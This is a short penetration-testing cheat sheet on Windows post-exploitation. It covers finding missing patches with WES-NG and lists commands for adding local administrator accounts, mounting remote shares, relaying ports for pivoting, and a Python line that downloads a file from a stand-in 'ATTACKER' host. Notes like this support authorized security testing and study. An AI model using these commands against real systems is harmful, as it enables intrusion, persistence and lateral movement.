Windows Exploits¶
Finding and exploiting missing patches and misconfigurations to gain or extend access on Windows hosts.
Why It Matters¶
Windows hosts in an environment are often behind on patches or carry legacy configurations. Identifying the exact patch level points straight at known vulnerabilities, and a handful of built-in commands cover most of what is needed to act on a foothold.
Reference¶
Finding Missing Patches¶
Windows Exploit Suggester (WES-NG) compares a host's patch level against known vulnerabilities.
wes.py --update # update the database
systeminfo > systeminfo.txt # on the target
wes.py systeminfo.txt # analyze offline
List installed hotfixes, newest first:
Get-HotFix | Sort-Object InstalledOn -Descending
Useful Built-in Commands¶
| Task | Command |
|---|---|
| Search files for a string | ls -r C:\path -file \| % {Select-String -path $_ -pattern STRING} |
| Mount a remote share | net use X: \IP\c$ |
| Add a user | net user <name> <password> /add |
| Add a user to local admins | net localgroup Administrators <name> /add |
| Find files with a user's SID in the ACL | icacls c:\*. /findsid <name> /t /c /l |
| TCP port forward relay | netsh interface portproxy add v4tov6 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST> |
Simple File Transfer with Python¶
# download a file to the host
import urllib.request; urllib.request.urlretrieve("http://ATTACKER/file","C:\file")
# serve the current directory
python -m http.server 8000
How I Use It¶
After a foothold I capture systeminfo and run it through WES-NG offline, so I am not scanning the host live. Missing-patch findings get validated before firing anything. The built-in net and netsh commands cover most immediate needs (shares, users, pivoting) without dropping extra tools on the host.